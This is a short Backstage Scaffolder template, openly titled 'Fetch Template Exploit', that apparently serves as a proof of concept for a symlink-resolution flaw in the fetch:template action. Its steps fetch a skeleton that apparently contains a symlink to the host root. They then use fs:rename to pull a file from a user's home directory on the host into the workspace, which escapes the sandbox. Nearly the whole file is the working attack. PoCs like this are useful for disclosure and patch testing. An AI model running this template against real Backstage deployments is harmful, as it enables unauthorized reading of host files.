apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: fetch-template-exploit
  title: Fetch Template Exploit
  description: "A Scaffolder template exploiting symlink resolving in fetch:template action"
spec:
  type: service
  owner: user:guest
  parameters:
    - title: Provide some simple information
      properties:
        text:
          title: some text
          type: string
  steps:
    - id: fetchTemplate
      name: Fetch file
      action: fetch:template
      input:
        url: ./skeleton
    - id: log-message
      name: print workspace
      action: debug:log
      input:
        listWorkspace: true
    - id: renameOneOfTheRootFiles
      name: Rename a file at root
      action: fs:rename
      input:
        files:
          - from: ./symlink-to-root-folder/home/jussi/file.txt
            to: ./file-copied-workspace.txt
    - id: log-message
      name: Log Message
      action: debug:log
      input:
        listWorkspace: true
